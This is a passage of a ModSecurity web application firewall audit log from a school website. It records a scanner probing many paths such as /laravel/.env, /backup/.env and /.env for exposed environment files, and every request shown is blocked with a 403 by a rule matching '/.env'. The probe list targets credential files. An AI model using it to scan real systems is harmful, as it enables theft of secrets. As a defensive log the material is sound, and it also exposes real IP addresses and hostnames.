HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e13607e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424801774460 822 (- - -) Stopwatch2: 1745424801774460 822; combined=310, p1=271, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7e13607e-Z-- --1206fb71-A-- [23/Apr/2025:23:13:21 +0700] aAkRoRuwXEWV6ydgl52X1AAAAAM 103.236.140.4 38040 103.236.140.4 8181 --1206fb71-B-- GET /code/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --1206fb71-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1206fb71-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424801968429 833 (- - -) Stopwatch2: 1745424801968429 833; combined=305, p1=271, p2=0, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1206fb71-Z-- --b831c243-A-- [23/Apr/2025:23:13:22 +0700] aAkRoj1ahuoJLEjKiAU05wAAAIQ 103.236.140.4 38046 103.236.140.4 8181 --b831c243-B-- GET /db/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --b831c243-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b831c243-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424802163200 815 (- - -) Stopwatch2: 1745424802163200 815; combined=297, p1=262, p2=0, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b831c243-Z-- --26fcfe25-A-- [23/Apr/2025:23:13:22 +0700] aAkRohuwXEWV6ydgl52X1gAAABM 103.236.140.4 38052 103.236.140.4 8181 --26fcfe25-B-- GET /login/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --26fcfe25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --26fcfe25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424802357076 832 (- - -) Stopwatch2: 1745424802357076 832; combined=346, p1=284, p2=0, p3=0, p4=0, p5=62, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --26fcfe25-Z-- --daf8f647-A-- [23/Apr/2025:23:13:22 +0700] aAkRotIw_rqnm4P5_afOJQAAAEA 103.236.140.4 38058 103.236.140.4 8181 --daf8f647-B-- GET /api_v1/go/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --daf8f647-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --daf8f647-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424802551230 700 (- - -) Stopwatch2: 1745424802551230 700; combined=253, p1=224, p2=0, p3=0, p4=0, p5=29, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --daf8f647-Z-- --7bbb597b-A-- [23/Apr/2025:23:13:22 +0700] aAkRojI97BrbgvDq16RsSQAAAM4 103.236.140.4 38068 103.236.140.4 8181 --7bbb597b-B-- GET /api_v1/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --7bbb597b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7bbb597b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424802747608 729 (- - -) Stopwatch2: 1745424802747608 729; combined=268, p1=239, p2=0, p3=0, p4=0, p5=29, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7bbb597b-Z-- --b09c2c64-A-- [23/Apr/2025:23:13:22 +0700] aAkRojI97BrbgvDq16RsSgAAANA 103.236.140.4 38074 103.236.140.4 8181 --b09c2c64-B-- GET /api_v2/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --b09c2c64-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b09c2c64-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424802940935 918 (- - -) Stopwatch2: 1745424802940935 918; combined=356, p1=319, p2=0, p3=0, p4=0, p5=37, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b09c2c64-Z-- --f99e0112-A-- [23/Apr/2025:23:13:23 +0700] aAkRozI97BrbgvDq16RsSwAAAMU 103.236.140.4 38076 103.236.140.4 8181 --f99e0112-B-- GET /api_v2/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --f99e0112-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f99e0112-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424803136409 755 (- - -) Stopwatch2: 1745424803136409 755; combined=278, p1=244, p2=0, p3=0, p4=0, p5=34, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f99e0112-Z-- --7357b471-A-- [23/Apr/2025:23:13:23 +0700] aAkRoxuwXEWV6ydgl52X3AAAAA8 103.236.140.4 38088 103.236.140.4 8181 --7357b471-B-- GET /v2/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --7357b471-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7357b471-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424803525294 837 (- - -) Stopwatch2: 1745424803525294 837; combined=299, p1=266, p2=0, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7357b471-Z-- --4304d66a-A-- [23/Apr/2025:23:13:23 +0700] aAkRoxuwXEWV6ydgl52X4AAAAA4 103.236.140.4 38104 103.236.140.4 8181 --4304d66a-B-- GET /v1/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4304d66a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4304d66a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424803919223 826 (- - -) Stopwatch2: 1745424803919223 826; combined=298, p1=264, p2=0, p3=0, p4=0, p5=34, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4304d66a-Z-- --9fea5f00-A-- [23/Apr/2025:23:13:24 +0700] aAkRpNIw_rqnm4P5_afOJgAAAEo 103.236.140.4 38110 103.236.140.4 8181 --9fea5f00-B-- GET /admin/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --9fea5f00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fea5f00-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424804113723 879 (- - -) Stopwatch2: 1745424804113723 879; combined=319, p1=284, p2=0, p3=0, p4=0, p5=34, sr=115, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9fea5f00-Z-- --f1bfdd08-A-- [23/Apr/2025:23:13:24 +0700] aAkRpBuwXEWV6ydgl52X4gAAAAU 103.236.140.4 38112 103.236.140.4 8181 --f1bfdd08-B-- GET /laravel/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --f1bfdd08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1bfdd08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424804307515 758 (- - -) Stopwatch2: 1745424804307515 758; combined=315, p1=285, p2=0, p3=0, p4=0, p5=30, sr=112, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1bfdd08-Z-- --15f3dc67-A-- [23/Apr/2025:23:13:24 +0700] aAkRpNIw_rqnm4P5_afOJwAAAEg 103.236.140.4 38122 103.236.140.4 8181 --15f3dc67-B-- GET /ci4/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --15f3dc67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15f3dc67-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424804500888 873 (- - -) Stopwatch2: 1745424804500888 873; combined=279, p1=240, p2=0, p3=0, p4=0, p5=39, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15f3dc67-Z-- --ad9c4b01-A-- [23/Apr/2025:23:13:24 +0700] aAkRpBuwXEWV6ydgl52X5gAAABY 103.236.140.4 38132 103.236.140.4 8181 --ad9c4b01-B-- GET /backup/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --ad9c4b01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ad9c4b01-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424804694320 858 (- - -) Stopwatch2: 1745424804694320 858; combined=326, p1=294, p2=0, p3=0, p4=0, p5=32, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad9c4b01-Z-- --dd64ae12-A-- [23/Apr/2025:23:13:24 +0700] aAkRpBuwXEWV6ydgl52X6AAAAAY 103.236.140.4 38138 103.236.140.4 8181 --dd64ae12-B-- GET /frontend/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --dd64ae12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dd64ae12-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424804888935 837 (- - -) Stopwatch2: 1745424804888935 837; combined=315, p1=279, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dd64ae12-Z-- --33d47417-A-- [23/Apr/2025:23:13:25 +0700] aAkRpRuwXEWV6ydgl52X6gAAAAk 103.236.140.4 38144 103.236.140.4 8181 --33d47417-B-- GET /old/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --33d47417-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33d47417-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424805083162 702 (- - -) Stopwatch2: 1745424805083162 702; combined=267, p1=238, p2=0, p3=0, p4=0, p5=29, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33d47417-Z-- --6f92da5e-A-- [23/Apr/2025:23:13:25 +0700] aAkRpdIw_rqnm4P5_afOKQAAAFM 103.236.140.4 38150 103.236.140.4 8181 --6f92da5e-B-- GET /dev/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --6f92da5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6f92da5e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424805277054 824 (- - -) Stopwatch2: 1745424805277054 824; combined=327, p1=290, p2=0, p3=0, p4=0, p5=37, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6f92da5e-Z-- --57afc463-A-- [23/Apr/2025:23:13:25 +0700] aAkRpRuwXEWV6ydgl52X7AAAAA8 103.236.140.4 38152 103.236.140.4 8181 --57afc463-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.141.243 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.141.243 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --57afc463-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57afc463-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745424805470588 662 (- - -) Stopwatch2: 1745424805470588 662; combined=247, p1=221, p2=0, p3=0, p4=0, p5=26, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 